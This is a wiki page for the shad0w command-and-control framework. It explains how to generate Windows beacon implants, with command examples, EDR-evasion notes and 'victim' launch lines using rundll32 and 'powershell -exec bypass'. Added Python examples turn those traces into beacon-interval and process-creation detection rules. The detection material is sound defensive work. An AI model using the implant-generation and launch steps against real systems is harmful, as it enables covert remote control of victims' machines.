Lee Baird edited this page Mar 21, 2021 · 13 revisions

shad0w implants are called beacons. There are two types of beacons:

  • Secure beacons are designed to operate in environments where it is vital to remain undetected.
  • Insecure beacons are for environments where security is much more relaxed.

shad0w beacon --help
usage: shad0w beacon [-h] -p PAYLOAD -H ADDRESS [-P PORT] [-j JITTER] -f {raw,exe,psh,dll} -o OUT [-n] [-d]

optional arguments:
  -h, --help            show this help message and exit
  -p PAYLOAD, --payload PAYLOAD
                        Beacon payload to use
  -H ADDRESS, --address ADDRESS
                        Address the beacon will connect to
  -P PORT, --port PORT  Port the beacon will connect on
  -j JITTER, --jitter JITTER
                        Jitter the beacon should use when connecting back
  -f {raw,exe,psh,dll}, --format {raw,exe,psh,dll}
                        Format to store the beacon payload as
  -o OUT, --out OUT     File to store the beacon in
  -n, --no-shrink       Leave the file at its final size, do not attempt to shrink it
  -d, --debug           Start debug mode

Beacons have two payload options:

  • Staged payloads only contain a stub, which will download and execute the rest of the payload.
  • Static payloads are self-contained and store all the beacon code inside. This makes the payload much larger in size.

There is also support for Metasploit reverse_https stagers, which will be covered in more detail later.

Payload

Use the -p flag to set the payload. The format consists of arch/os/secure/static.

To generate a 64-bit Windows secure staged beacon, use x64/windows/secure.
To generate a 64-bit Windows static beacon, use x64/windows/secure/static.

Currently there is only support for 64-bit Windows. In the future, there will be a much wider range of architectures and operating systems supported.

Address

Use the -H flag to set the IP address or domain that the beacon will call back to.
This can either be a redirector or the C2 depending on your tradecraft.

Port

Use the -P flag to set the port that the beacon will call back on.
By default, this is set to 443.

Jitter

Use the -j flag to set the delay between callbacks that the beacon will make.
By default, this is set to 1 second.
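
A fixed callback delay is also the most reliable thing a defender has to key on: a beacon that sleeps the same interval between connections produces near-identical gaps to the same destination. The block below is an added example in Python, not code from shad0w or this wiki. It groups a constructed connection log (the timestamps and addresses are made up, not captured traffic) by (src, dst, port) flow and scores each flow by the spread of its inter-arrival gaps; the threshold values min_conns=8 and max_cv=0.1 are illustrative choices, not values from this page.

```python
"""Beacon-interval scoring over a connection log (added example, not shad0w code).

A beacon that sleeps a fixed interval between callbacks (shad0w's -j value, 1 s by
default) produces near-identical gaps between successive connections to the same
destination. Each (src, dst, port) flow is scored by the spread of those gaps:
many connections with a low coefficient of variation is the beaconing signal.
"""
from collections import defaultdict
from statistics import mean, median, pstdev

# Constructed sample log, one connection per line: "epoch_ts src_ip dst_ip dst_port".
# Flow 10.0.0.5 -> 203.0.113.7:443 calls back every ~1 s (a 1 s jitter setting);
# flow 10.0.0.8 -> 198.51.100.20:443 is irregular, browsing-style traffic.
SAMPLE_CONN_LOG = """\
1616284800.000 10.0.0.5 203.0.113.7 443
1616284800.000 10.0.0.8 198.51.100.20 443
1616284801.010 10.0.0.5 203.0.113.7 443
1616284802.005 10.0.0.5 203.0.113.7 443
1616284803.012 10.0.0.5 203.0.113.7 443
1616284803.500 10.0.0.8 198.51.100.20 443
1616284804.003 10.0.0.5 203.0.113.7 443
1616284805.009 10.0.0.5 203.0.113.7 443
1616284806.001 10.0.0.5 203.0.113.7 443
1616284807.008 10.0.0.5 203.0.113.7 443
1616284808.004 10.0.0.5 203.0.113.7 443
1616284809.011 10.0.0.5 203.0.113.7 443
1616284815.200 10.0.0.8 198.51.100.20 443
1616284816.000 10.0.0.8 198.51.100.20 443
1616284840.700 10.0.0.8 198.51.100.20 443
1616284842.100 10.0.0.8 198.51.100.20 443
"""


def parse_conn_log(text):
    """Group connection timestamps by (src, dst, port) flow."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, port = line.split()
        flows[(src, dst, int(port))].append(float(ts))
    return flows


def interval_stats(timestamps):
    """Count, median gap and coefficient of variation of the gaps; None if too few."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    mu = mean(gaps)
    cv = pstdev(gaps) / mu if mu > 0 else float("inf")
    return {"count": len(ts), "median_gap": median(gaps), "cv": cv}


def find_beacons(text, min_conns=8, max_cv=0.1):
    """Flows with at least min_conns connections whose gap spread is at most max_cv."""
    hits = []
    for flow, ts in sorted(parse_conn_log(text).items()):
        st = interval_stats(ts)
        if st and st["count"] >= min_conns and st["cv"] <= max_cv:
            hits.append((flow, st))
    return hits


if __name__ == "__main__":
    for (src, dst, port), st in find_beacons(SAMPLE_CONN_LOG):
        print(f"{src} -> {dst}:{port}  n={st['count']}  "
              f"median gap {st['median_gap']:.3f}s  cv {st['cv']:.3f}")
```

Only the 1-second flow is reported; the browsing-style flow has both too few connections and a wide gap spread. A beacon whose sleep is randomised spreads the gaps and pushes the coefficient of variation up, so in practice the thresholds are tuned against a baseline of normal traffic and the collection window is made long enough that the median gap still stands out.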

Format

Use the -f flag to set the format of the beacon to EXE, DLL, PowerShell or shellcode.
These options correspond to exe, dll, psh and raw respectively.

Output

Use the -o flag to set the file used to store the generated beacon.

No Shrink

Use the -n flag to skip shrinking and leave the beacon at its final size.
Because of the JSON library that beacons use, the file size can be quite large.
By default, the EXE is therefore compressed via UPX to reduce the file size.
Obfuscation methods are then leveraged to hide the fact that UPX was used.

Debug Mode

Use the -d flag to compile the beacon in debug mode.

Examples

  • Generate a 64-bit Windows secure staged beacon in EXE format.

    shad0w beacon -p x64/windows/secure -H 192.168.0.20 -f exe -o update-staged.exe

    The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
    make the payload a lot more resistant to EDR products, but can also make it more unstable.
    It has been tested on:
        x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
        x64 Windows Server 2019
    It may work on other systems as well.

    [+] Created update.exe (340992 bytes)

  • Generate a 64-bit Windows secure static beacon in EXE format.

    shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f exe -o update.exe

    The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
    make the payload a lot more resistant to EDR products, but can also make it more unstable.
    It has been tested on:
        x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
        x64 Windows Server 2019
    It may work on other systems as well.

    Static payloads can be very large and much easier to detect. For use in droppers, loaders,
    exploits, etc, staged payloads are recommended as they are much smaller and easier to use.

    [+] Created update.exe (379392 bytes)

  • Generate a 64-bit Windows secure static beacon in DLL format.
    This payload can be used for persistence or DLL hijacking.

    shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f dll -o update.dll

    The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
    make the payload a lot more resistant to EDR products, but can also make it more unstable.
    It has been tested on:
        x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
        x64 Windows Server 2019
    It may work on other systems as well.

    Static payloads can be very large and much easier to detect. For use in droppers, loaders,
    exploits, etc, staged payloads are recommended as they are much smaller and easier to use.

    [+] Created update.dll (462320 bytes)

    To execute locally on the victim:

        C:\Users\lee\Downloads>rundll32 update.dll,x

    You will see a pop-up error message. If you click on OK, you will lose your beacon.
    This execution method is just for testing the payload and is not for use in the real world.

  • Generate a 64-bit Windows secure static beacon in PowerShell format.

    shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f psh -o update.ps1

    To execute locally on the victim:

        C:\Users\lee\Downloads>powershell -nop -exec bypass
        PS C:\Users\lee\Downloads>.\update.ps1

  • Generate a 64-bit Windows secure static beacon in shellcode format.

    shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f raw -o update.bin

  • Generate a 64-bit Windows secure staged beacon in shellcode format.

    shad0w beacon -p x64/windows/secure -H 192.168.0.20 -f raw -o update-staged.bin
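
The two local test launches above (rundll32 with a bare export name from a Downloads folder, and powershell started with -nop -exec bypass from the same folder) are exactly the shapes that process-creation telemetry is tuned to catch. The block below is an added example in Python, not code from shad0w or this wiki. It runs two small rules over constructed Sysmon-style process-creation events (JSON lines; the events are made up, the field names Image, CommandLine, CurrentDirectory and ParentImage follow Sysmon event 1) and reports why each event was flagged. The list of user-writable directories and the "export name of two characters or fewer" heuristic are assumptions made for the example, not values from this page.

```python
"""Process-creation triage for the local test launches above (added example, not shad0w code).

Both launches leave a distinct footprint in process-creation telemetry (Sysmon
event 1, Windows 4688 or an EDR equivalent): rundll32.exe loading a DLL from a
user-writable directory with a bare export name, and powershell.exe started with
-nop / -exec bypass from that same directory. The rules below run over
constructed JSON-lines events whose field names follow Sysmon's.
"""
import json
import ntpath
import re

_RAW_EVENTS = [  # constructed, not real telemetry
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32 update.dll,x",
     "CurrentDirectory": r"C:\Users\lee\Downloads", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -exec bypass",
     "CurrentDirectory": r"C:\Users\lee\Downloads", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "CurrentDirectory": r"C:\Windows\System32", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -File "C:\Program Files\Vendor\maint.ps1"',
     "CurrentDirectory": r"C:\Windows\System32", "ParentImage": r"C:\Windows\System32\svchost.exe"},
]
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in _RAW_EVENTS)

USER_WRITABLE = re.compile(  # assumed list of directories an unprivileged user can write to
    r"\\users\\[^\\]+\\(downloads|desktop|documents|appdata)\\|\\users\\public\\|\\temp\\|\\programdata\\",
    re.IGNORECASE)
RUNDLL32_RE = re.compile(r'^\s*\S*rundll32(?:\.exe)?"?\s+"?([^",]+)"?,(\S+)', re.IGNORECASE)
POWERSHELL_RE = [
    (re.compile(r"(?<!\S)-no?p(?:rofile)?(?!\S)", re.I), "profile suppressed"),
    (re.compile(r"(?<!\S)-e(?:xec|xecutionpolicy|p)?\s+bypass(?!\S)", re.I), "execution policy bypassed"),
    (re.compile(r"(?<!\S)-w(?:indowstyle)?\s+hidden(?!\S)", re.I), "window hidden"),
    (re.compile(r"(?<!\S)-e(?:nc|ncodedcommand)(?!\S)", re.I), "encoded command"),
]


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def in_user_writable_dir(path: str) -> bool:
    return bool(USER_WRITABLE.search(path + "\\"))


def rundll32_findings(ev):
    if not ev["Image"].lower().endswith("rundll32.exe"):
        return []
    m = RUNDLL32_RE.match(ev["CommandLine"])
    if not m:
        return []
    dll, export = m.group(1).strip(), m.group(2)
    # A relative DLL path resolves against the process's working directory.
    full = ntpath.normpath(ntpath.join(ev.get("CurrentDirectory", ""), dll))
    reasons = []
    if in_user_writable_dir(full):
        reasons.append(f"rundll32 loads DLL from user-writable path {full}")
    if len(export) <= 2:
        reasons.append(f"rundll32 export name '{export}' is unusually short")
    return reasons


def powershell_findings(ev):
    if not ev["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    reasons = [label for rx, label in POWERSHELL_RE if rx.search(ev["CommandLine"])]
    if reasons and in_user_writable_dir(ev.get("CurrentDirectory", "")):
        reasons.append("started from a user-writable directory")
    return reasons


def triage(text):
    """(command line, reasons) for every event that trips at least one rule."""
    hits = []
    for ev in parse_events(text):
        reasons = rundll32_findings(ev) + powershell_findings(ev)
        if reasons:
            hits.append((ev["CommandLine"], reasons))
    return hits


if __name__ == "__main__":
    for cmd, reasons in triage(SAMPLE_EVENTS):
        print(cmd, "->", "; ".join(reasons))
```

The two benign events (shell32's Control_RunDLL via rundll32, and a vendor script run with -File from System32) pass untouched, while both test launches are reported with every reason that applied. Resolving the relative DLL path against CurrentDirectory matters: the command line alone ("rundll32 update.dll,x") says nothing about where the file lives.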
